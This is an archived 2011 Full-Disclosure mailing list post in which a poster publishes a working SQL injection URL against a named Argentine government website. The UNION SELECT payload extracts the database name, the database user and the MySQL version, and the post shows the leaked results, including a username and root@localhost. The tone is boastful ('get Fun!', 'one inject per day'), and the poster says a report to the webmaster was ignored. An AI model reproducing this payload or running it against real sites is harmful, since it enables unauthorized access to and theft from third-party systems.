lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 24 Apr 2011 15:58:54 -0300
From: injec7or hell <injec7or@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: inject sql in mecon.gov.ar

http://www.accionpyme.mecon.gov.ar/dna2/tooltip_hist.php?width=600&id=2373757078%20union%20select%201,2,3,4,database(),6,7,user(),9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35&idpreg=4837

and the answer is ...

Fecha Valor Usuario
2009-06-04 20:02:20
Adolfo Esposito
root@...alhost
forms2
5.0.51a-24+lenny2-log 14

get Fun!

ps:one inject per day
ps2: has been reported and ignored by "THE" webmaster
-- 
---
Injec7or

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ